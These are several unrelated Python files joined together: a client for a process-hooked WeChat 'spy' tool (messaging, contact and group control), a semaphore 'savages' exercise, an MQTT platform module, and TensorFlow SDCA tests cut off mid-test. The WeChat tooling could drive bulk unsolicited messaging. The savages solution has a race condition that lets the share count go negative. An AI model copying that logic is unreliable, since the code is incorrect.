request.cmd = CONTACT_DETAILS
request.wxid = wxid
request.update = 1 if update else 0
return self.__send(request, pid, port)
def query_contact_details(self, wxid: str, update: bool = False, pid: int = 0, port: int = 0):
warnings.warn(
"The function 'query_contact_details' is deprecated, "
"and has been replaced by the function 'get_contact_details'", DeprecationWarning)
return self.get_contact_details(wxid, update, pid, port)
def get_chatroom_members(self, wxid: str, pid: int = 0, port: int = 0):
"""
获取群成员列表
:param wxid: 群wxid
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = CHATROOM_MEMBERS
request.wxid = wxid
return self.__send(request, pid, port)
def query_chatroom_member(self, wxid: str, pid: int = 0, port: int = 0):
warnings.warn(
"The function 'query_chatroom_member' is deprecated, "
"and has been replaced by the function 'get_chatroom_members'", DeprecationWarning)
return self.get_chatroom_members(wxid, pid, port)
def send_text(self, wxid: str, content: str, at_wxid: str = "", pid: int = 0, port: int = 0):
"""
发送文本消息
:param wxid: 文本消息接收wxid
:param content: 文本消息内容
:param at_wxid: 如果wxid为群wxid且需要@群成员 此参数为被@群成员wxid,以英文逗号分隔
:param pid:
:param port:
"""
if not wxid.endswith("chatroom"):
at_wxid = ""
request = spy_pb2.Request()
request.cmd = SEND_TEXT
request.wxid = wxid
request.at_wxid = at_wxid
request.content = content
return self.__send(request, pid, port)
def send_image(self, wxid: str, image_path: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'send_image' is deprecated, and has been replaced by the function 'send_file'",
DeprecationWarning)
return self.send_file(wxid, image_path, pid, port)
def send_file(self, wxid: str, file_path: str, pid: int = 0, port: int = 0):
"""
发送文件消息
:param wxid: 文件消息接收wxid
:param file_path: 文件路径
:param pid:
:param port:
"""
if len(file_path.split("\\")) > 8:
return self.logger.warning(f"File path is too long: {file_path}")
request = spy_pb2.Request()
request.cmd = SEND_FILE
request.wxid = wxid
request.content = file_path
return self.__send(request, pid, port)
def accept_new_contact(self, encryptusername: str, ticket: str, pid: int = 0, port: int = 0):
"""
接受好友请求
:param encryptusername:
:param ticket:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = ACCEPT_CONTACT
request.encryptusername = encryptusername
request.ticket = ticket
return self.__send(request, pid, port)
def send_announcement(self, wxid: str, content: str, pid: int = 0, port: int = 0):
"""
发送群公共
:param wxid: 群wxid
:param content: 公告内容
:param pid:
:param port:
:return:
"""
if not wxid.endswith("chatroom"):
return self.logger.warning("Can only send announcements to chatrooms")
request = spy_pb2.Request()
request.cmd = SEND_ANNOUNCEMENT
request.wxid = wxid
request.content = content
return self.__send(request, pid, port)
def create_chatroom(self, wxid: str, pid: int = 0, port: int = 0):
"""
创建群聊
:param wxid: wxid,以","分隔 至少需要两个
:param pid:
:param port:
:return:
"""
if len(wxid.split(",")) < 2:
return self.logger.warning("This function requires at least two wxids separated by ','")
request = spy_pb2.Request()
request.cmd = CREATE_CHATROOM
request.wxid = wxid
return self.__send(request, pid, port)
def share_chatroom(self, chatroom_wxid: str, wxid: str, pid: int = 0, port: int = 0):
"""
分享群聊邀请链接
:param chatroom_wxid:
:param wxid:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = SHARE_CHATROOM
request.wxid = wxid
request.chatroom_wxid = chatroom_wxid
return self.__send(request, pid, port)
def remove_chatroom_member(self, chatroom_wxid: str, wxid: str, pid: int = 0, port: int = 0):
"""
移除群成员
:param chatroom_wxid:
:param wxid:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = REMOVE_CHATROOM_MEMBER
request.wxid = wxid
request.chatroom_wxid = chatroom_wxid
return self.__send(request, pid, port)
def remove_contact(self, wxid: str, pid: int = 0, port: int = 0):
"""
移除联系人
:param wxid:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = REMOVE_CONTACT
request.wxid = wxid
return self.__send(request, pid, port)
def add_contact(self, wxid: str, chatroom_wxid: str = "", greeting: str = "",
add_type: int = 1, pid: int = 0, port: int = 0):
"""
添加联系人
add_type = 313: wxid、chatroom_wxid、greeting必填
add_type = 314: wxid, greeting必填
add_type = 315: wxid 必填
:param wxid: 目标用户wxid
:param chatroom_wxid: 目标用户所在群
:param greeting: 招呼
:param add_type: 添加类型 313:从群聊中添加 314:自己被对方删除 315:对方被自己删除
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.wxid = wxid
if add_type == 1 and not chatroom_wxid:
return
request.cmd = add_type
request.chatroom_wxid = chatroom_wxid
request.content = greeting
return self.__send(request, pid, port)
def add_contact_from_chatroom(self, chatroom_wxid: str, wxid: str, msg: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'add_contact_from_chatroom' is deprecated, "
"and has been replaced by the function 'add_contact'", DeprecationWarning)
return self.add_contact(wxid, chatroom_wxid, msg, ADD_CONTACT_A, pid, port)
def add_unidirectional_contact_a(self, wxid: str, msg: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'add_unidirectional_contact_a' is deprecated, "
"and has been replaced by the function 'add_contact'", DeprecationWarning)
return self.add_contact(wxid, "", msg, ADD_CONTACT_B, pid, port)
def add_unidirectional_contact_b(self, wxid: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'add_unidirectional_contact_b' is deprecated, "
"and has been replaced by the function 'add_contact'", DeprecationWarning)
return self.add_contact(wxid, "", "", ADD_CONTACT_C, pid, port)
def get_contact_status(self, wxid: str, pid: int = 0, port: int = 0):
"""
获取联系人状态
:param wxid:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = CONTACT_STATUS
request.wxid = wxid
return self.__send(request, pid, port)
def check_contact_status(self, wxid: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'check_contact_status' is deprecated, "
"and has been replaced by the function 'get_contact_status'", DeprecationWarning)
return self.get_contact_status(wxid, pid, port)
def set_chatroom_name(self, wxid: str, name: str, pid: int = 0, port: int = 0):
"""
设置群聊名称
:param wxid:
:param name:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = SET_CHATROOM_NAME
request.wxid = wxid
request.content = name
return self.__send(request, pid, port)
def set_save_folder(self, folder: str, pid: int = 0, port: int = 0):
"""
设置保存路径
:param folder:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = SET_SAVE_FOLDER
request.content = folder
return self.__send(request, pid, port)
def show_qrcode(self, output_path: str = "", pid: int = 0, port: int = 0):
"""
显示登录二维码
:param output_path: 输出文件路径
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = QRCODE
request.content = output_path
return self.__send(request, pid, port)
|
tribe_of_savages.py | #!/usr/bin/env python
"""tribe_of_savages.py: A tribe eats dinners from a pot that holds M shares.
When a savage wants to eat he helps himself, if the pot is empty he wakes the cook
the savages wait until the cook completely fills the pot. The cook refills only when
the pot is empty. There is only one cook and an arbitrary amount of savages.
Solve using semaphores."""
__author__ = "Justin Overstreet"
__copyright__ = "oversj96.github.io"
import threading
from multiprocessing import Process
from random import *
import time
cook = threading.Semaphore(1)
pot_access = threading.Semaphore(1)
shares = 20 # can be any value
def fill_pot():
global shares
while True:
print("The cook goes to sleep")
cook.acquire()
print("The cook is awake")
pot_access.acquire()
print("The cook has taken the pot")
shares = 20
pot_access.release()
print("The cook has refilled the pot")
def savage():
global shares
print("A savage has come to eat!")
if shares == 0:
print("The pot is empty and a savage has woken the cook")
cook.release()
print("A savage wants to draw from the pot!")
pot_access.acquire()
print("A savage draws from the pot")
shares -= 1
pot_access.release()
print("A savage has eaten and left")
def generate_savages():
global shares
while True:
for i in range(1, randint(2, 30)):
savage()
print(f"There is {shares} share(s) left after {i} savage(s) ate.")
time.sleep(randint(0, 5))
if __name__ == "__main__":
p = threading.Thread(target = fill_pot)
p2 = threading.Thread(target = generate_savages)
p.start()
p2.start() |
Platform.py | import json
from sys import platform
import threading
from typing import Any, Optional
import paho.mqtt.client as mqtt
from pydantic.class_validators import validator
from modules.base.Configuration import *
from modules.base.Instances import *
class MqttAvailabilityConfiguration(Configuration):
'''Availability topic and last will.'''
topic: str
'''configured topic for the mqtt client's last will and we also send a message on connect'''
payload_on: str
'''payload to send when connected succsessfully'''
payload_off: str
'''payload to send when the connection dissapered (last will)'''
@configuration
class MqttPlatformConfiguration(PlatformConfiguration):
'''Configuration settings for the MQTT platform.'''
@validator('platform')
def check_platform(cls, v):
if "plugins.mqtt" not in v:
raise ValueError("wrong platform: plugins.mqtt, is: " + v)
return v
host: str
'''MQTT server address'''
port: int
'''MQTT server port'''
keep_alive: Optional[int] = 60
'''seconds to keep the server connection'''
availability: Optional[MqttAvailabilityConfiguration]
'''Availability topic and last will'''
on_connected: Optional[list[AutomationConfiguration]] = []
'''List of Automations to execute when the connection to the host is established, see `modules.base.Configuration.AutomationConfiguration`'''
on_disconnected: Optional[list[AutomationConfiguration]] = []
'''List of Automations to execute when the connection to the host is lost, see `modules.base.Configuration.AutomationConfiguration`'''
on_message: Optional[list[AutomationConfiguration]] = []
'''List of Automations to execute when a MQTT message is received, see `modules.base.Configuration.AutomationConfiguration`'''
class Platform(BasePlatform):
'''MQTT Platform'''
def __init__(self, parent: Stackable, config: MqttPlatformConfiguration) -> None:
super().__init__(parent, config)
self.app = parent.get_app()
self.configuration = config
self.callbacks = []
def start(self, call_stack: CallStack):
def render(var):
'''this is only to avoid typing errors'''
return str(call_stack.get(var))
app_id = str(self.app.get_variable_value("id"))
self.client = mqtt.Client(app_id + "_" + render(self.app.get_id("device").configuration.name)) #type: ignore
self.client.on_connect = self.__init_on_connect()
self.client.on_disconnect = self.__init_on_disconnect()
self.client.on_message = self.__init_on_message()
self.client.connect(self.configuration.host, self.configuration.port, self.configuration.keep_alive)
if self.configuration.availability:
av = self.configuration.availability
av_topic = render(av.topic)
av_payload_on = render(av.payload_on)
av_payload_off = render(av.payload_off)
self.client.will_set(av_topic, av_payload_off)
self.client.subscribe(av_topic)
av = self.configuration.availability
self.publish(av_topic, av_payload_on, retain = True)
def loop():
self.client.loop_start()
loop_thread = threading.Thread(target=loop)
loop_thread.start()
super().start(call_stack)
def dispose(self):
self.client.loop_stop()
return super().dispose()
def __init_on_message(self):
self.on_message_automations = []
if self.configuration.on_message:
for automation in self.configuration.on_message:
self.on_message_automations.append(Automation(self, automation))
def method(client, userdata, msg):
payload = msg.payload.decode("utf-8")
try:
payload = json.loads(payload)
except:
payload = str(payload)
call_stack = CallStack()\
.with_stack(self.get_full_stack()) \
.with_keys({
"payload": payload,
"topic": msg.topic
})
for callback in self.callbacks:
if callback["topic"] == msg.topic:
callback["callback"](call_stack)
elif str(callback["topic"]).endswith("+") or str(callback["topic"]).endswith("#"):
if str(msg.topic).startswith(str(callback["topic"])[0:-2]):
callback["callback"](call_stack)
for automation in self.on_message_automations:
automation.invoke(call_stack)
return method
def __init_on_disconnect(self):
self.on_disconnect_actions = []
if self.configuration.on_disconnected:
for automation in self.configuration.on_disconnected:
self.on_disconnect_actions.append(Automation(self, automation))
def method(client, userdata, flags):
call_stack = CallStack()\
.with_stack(self.get_full_stack()) \
.with_key("flags", flags)
for automation in self.on_disconnect_actions:
automation.invoke(call_stack)
return method
def __init_on_connect(self):
self.on_connected_actions = []
if self.configuration.on_connected:
for automationConfig in self.configuration.on_connected:
self.on_connected_actions.append(Automation(self, automationConfig))
def method(client, userdata, flags, rc):
call_stack = CallStack()\
.with_stack(self.get_full_stack()) \
.with_key("return_code", rc)
for callback in self.callbacks:
self.client.subscribe(callback["topic"])
for automation in self.on_connected_actions:
automation.invoke(call_stack)
return method
def subscribe(self, topic: str, callback=None):
if callback is not None:
self.callbacks.append({"topic": topic, "callback": callback})
self.client.subscribe(topic)
def publish(self, topic: str, payload: Any, retain: bool = False):
if type(payload) is dict:
payload = json.dumps(payload)
else:
#unexpected type, just send it as string
payload = str(payload)
self.client.publish(topic, payload, qos = 1, retain = retain)
|
sdca_ops_test.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SdcaModel."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
import tensorflow as tf
from tensorflow.core.example import example_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.platform import googletest
from tensorflow_estimator.python.estimator.canned.linear_optimizer.python.utils.sdca_ops import _SDCAModel
from tensorflow_estimator.python.estimator.canned.linear_optimizer.python.utils.sdca_ops import _SparseFeatureColumn
_MAX_ITERATIONS = 100
_SHARD_NUMBERS = [None, 1, 3]
_NUM_LOSS_PARTITIONS = [4]
def make_example_proto(feature_dict, target, value=1.0):
e = example_pb2.Example()
features = e.features
features.feature['target'].float_list.value.append(target)
for key, values in feature_dict.items():
features.feature[key + '_indices'].int64_list.value.extend(values)
features.feature[key + '_values'].float_list.value.extend([value] *
len(values))
return e
def make_example_dict(example_protos, example_weights):
def parse_examples(example_protos):
features = {
'target':
tf.io.FixedLenFeature(
shape=[1], dtype=tf.dtypes.float32, default_value=0),
'age_indices':
tf.io.VarLenFeature(dtype=tf.dtypes.int64),
'age_values':
tf.io.VarLenFeature(dtype=tf.dtypes.float32),
'gender_indices':
tf.io.VarLenFeature(dtype=tf.dtypes.int64),
'gender_values':
tf.io.VarLenFeature(dtype=tf.dtypes.float32)
}
return tf.compat.v1.io.parse_example(
[e.SerializeToString() for e in example_protos], features)
parsed = parse_examples(example_protos)
sparse_features = [
_SparseFeatureColumn(
tf.reshape(
tf.split(
value=parsed['age_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
tf.reshape(parsed['age_indices'].values, [-1]),
tf.reshape(parsed['age_values'].values, [-1])),
_SparseFeatureColumn(
tf.reshape(
tf.split(
value=parsed['gender_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
tf.reshape(parsed['gender_indices'].values, [-1]),
tf.reshape(parsed['gender_values'].values, [-1]))
]
return dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=example_weights,
example_labels=tf.reshape(parsed['target'], [-1]),
example_ids=['%d' % i for i in range(0, len(example_protos))])
def make_random_examples_and_variables_dicts(num_examples, dim, num_non_zero):
random.seed(1)
sparse_features = [
_SparseFeatureColumn(
[i for i in range(num_examples) for _ in range(num_non_zero)], [
i for _ in range(num_examples)
for i in random.sample(range(dim), num_non_zero)
], [num_non_zero**(-0.5) for _ in range(num_examples * num_non_zero)])
]
examples_dict = dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=[random.random() for _ in range(num_examples)],
example_labels=[
1. if random.random() > 0.5 else 0. for _ in range(num_examples)
],
example_ids=[str(i) for i in range(num_examples)])
weights = tf.compat.v1.Variable(tf.zeros([dim], dtype=tf.dtypes.float32))
variables_dict = dict(
sparse_features_weights=[weights], dense_features_weights=[])
return examples_dict, variables_dict
def make_variable_dict(max_age, max_gender, num_shards=None, partitioned=False):
# TODO(dbaylor): Figure out how to derive max_age & max_gender from
# examples_dict.
partitioner = None
if partitioned:
partitioner = tf.compat.v1.fixed_size_partitioner(num_shards=2, axis=0)
with tf.compat.v1.variable_scope(
name_or_scope=('variables/shard_{}'.format(num_shards)
if num_shards else 'variables'),
partitioner=partitioner):
age_weights = tf.compat.v1.get_variable(
name='age',
initializer=tf.zeros([max_age + 1], dtype=tf.dtypes.float32))
gender_weights = tf.compat.v1.get_variable(
name='gender',
initializer=tf.zeros([max_gender + 1], dtype=tf.dtypes.float32))
return dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
def make_dense_examples_and_variables_dicts(dense_features_values, weights,
labels):
"""Creates examples and variables dictionaries for dense features.
Variables shapes are inferred from the list of dense feature values passed as
argument.
Args:
dense_features_values: The values of the dense features
weights: The example weights.
labels: The example labels.
Returns:
One dictionary for the examples and one for the variables.
"""
dense_tensors = []
dense_weights = []
for dense_feature in dense_features_values:
dense_tensor = ops.convert_to_tensor(dense_feature, dtype=tf.dtypes.float32)
check_shape_op = tf.debugging.Assert(
tf.math.less_equal(tf.rank(dense_tensor), 2),
['dense_tensor shape must be [batch_size, dimension] or [batch_size]'])
# Reshape to [batch_size, dense_column_dimension].
with tf.control_dependencies([check_shape_op]):
dense_tensor = tf.reshape(dense_tensor,
[dense_tensor.get_shape().as_list()[0], -1])
dense_tensors.append(dense_tensor)
# Add variables of shape [feature_column_dimension].
dense_weights.append(
tf.compat.v1.Variable(
tf.zeros([dense_tensor.get_shape().as_list()[1]],
dtype=tf.dtypes.float32)))
examples_dict = dict(
sparse_features=[],
dense_features=dense_tensors,
example_weights=weights,
example_labels=labels,
example_ids=['%d' % i for i in range(0, len(labels))])
variables_dict = dict(
sparse_features_weights=[], dense_features_weights=dense_weights)
return examples_dict, variables_dict
def get_binary_predictions_for_logistic(predictions, cutoff=0.5):
return tf.cast(
tf.math.greater_equal(predictions,
tf.compat.v1.ones_like(predictions) * cutoff),
dtype=tf.dtypes.int32)
def get_binary_predictions_for_hinge(predictions):
return tf.cast(
tf.math.greater_equal(predictions, tf.compat.v1.zeros_like(predictions)),
dtype=tf.dtypes.int32)
# TODO(pmol): Refactor tests to avoid repetition of boilerplate code.
class _SDCAModelTest(TensorFlowTestCase):
"""Base SDCA optimizer test class for any loss type."""
def _single_threaded_test_session(self):
config = config_pb2.ConfigProto(
inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
return self.test_session(use_gpu=False, config=config)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithLogisticLossTest(_SDCAModelTest):
"""SDCA optimizer test class for logistic loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testPartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards, partitioned=True)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSomePartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [0],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
# Explicitly make age a [1]-shaped Variable (which cannot be
# partitioned), while making gender a PartitionedVariable.
age_weights = tf.compat.v1.Variable(
tf.zeros([1], dtype=tf.dtypes.float32))
with tf.compat.v1.variable_scope(
name_or_scope=('variables/shard_{}'.format(num_shards)
if num_shards else 'variables'),
partitioner=tf.compat.v1.fixed_size_partitioner(
num_shards=2, axis=0)):
gender_weights = tf.compat.v1.get_variable(
name='gender', initializer=tf.zeros([2], dtype=tf.dtypes.float32))
variables = dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.593014 is the unregularized_loss at that optimum.
self.assertAllClose(0.512591, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.593014, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSparseRandom(self):
dim = 20
num_examples = 1000
# Number of non-zero features per example.
non_zeros = 10
# Setup test data.
with self._single_threaded_test_session():
examples, variables = make_random_examples_and_variables_dicts(
num_examples, dim, non_zeros)
options = dict(
symmetric_l2_regularization=.1,
symmetric_l1_regularization=0,
num_table_shards=1,
adaptive=False,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
train_op = lr.minimize()
for _ in range(10):
train_op.run()
lr.update_weights(train_op).run()
self.assertNear(0.0, lr.approximate_duality_gap().eval(), err=1e-2)
def testSparseDuplicate(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0] * 5,
'gender': [0] * 5
}, 0),
make_example_proto({
'age': [1] * 5,
'gender': [1] * 5
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, 'Duplicate'):
train_op.run()
def testDistributedSimple(self):
# Distributed SDCA may not converge if the workers update concurrently the
# same example. In this test the examples are partitioned across workers.
# The examples are the same for all workers, just the example_ids are
# different.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
examples = make_example_dict(example_protos, example_weights)
example_ids = tf.compat.v1.placeholder(
tf.dtypes.string, shape=(len(example_weights),))
examples['example_ids'] = example_ids
variables = make_variable_dict(1, 1)
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
tf.compat.v1.get_default_graph().switch_to_thread_local()
for num_shards in _SHARD_NUMBERS:
for num_loss_partitions in _NUM_LOSS_PARTITIONS:
with self._single_threaded_test_session():
options = dict(
# Keep the same solution as for TestSimple: since the number of
# examples is multplied by num_loss_partitions, multiply also
# L2 by the same value.
symmetric_l2_regularization=num_loss_partitions,
symmetric_l1_regularization=0,
loss_type='logistic_loss',
num_table_shards=num_shards,
num_loss_partitions=num_loss_partitions)
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
def minimize(worker_id):
with context.graph_mode(), self._single_threaded_test_session():
feed_dict = {
example_ids: [
str(i + worker_id * len(example_weights))
for i in range(len(example_weights))
]
}
for _ in range(_MAX_ITERATIONS):
train_op.run(feed_dict=feed_dict) # pylint: disable=cell-var-from-loop
threads = []
for worker_id in range(num_loss_partitions):
threads.append(threading.Thread(target=minimize, args=(worker_id,)))
threads[-1].start()
for t in threads:
t.join()
lr.update_weights(train_op).run(feed_dict={
example_ids: [str(i) for i in range(len(example_weights))]
})
# Test only the unregularized loss because the optimal value of the
# regularized loss depends on num_loss_partitions.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.02)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertNear(0.0, lr.approximate_duality_gap().eval(), 0.02)
def testSimpleNoL2(self):
# L2 regularization of SDCA should be positive.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, 1)
options = dict(
symmetric_l2_regularization=0,
symmetric_l1_regularization=0,
num_table_shards=1,
loss_type='logistic_loss')
with self.assertRaises(ValueError):
_SDCAModel(examples, variables, options)
def testSomeUnweightedExamples(self):
# Setup test data with 4 examples, but should produce the same
# results as testSimple.
example_protos = [
# Will be used.
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 0),
# Will be used.
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 1),
]
example_weights = [1.0, 0.0, 1.0, 0.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
# Only use examples 0 and 2
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllClose([0, 1, 1, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testFractionalExampleLabel(self):
# Setup test data with 1 positive, and 1 mostly-negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0.1),
make_example_proto({
'age': [1],
'gender': [1]
}, 0.9),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
with self.assertRaisesOpError(
'Only labels of 0.0 or 1.0 are supported right now.'):
lr.minimize().run()
def testImbalanced(self):
# Setup test data with 1 positive, and 3 negative examples.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [2],
'gender': [0]
}, 0),
make_example_proto({
'age': [3],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(3, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
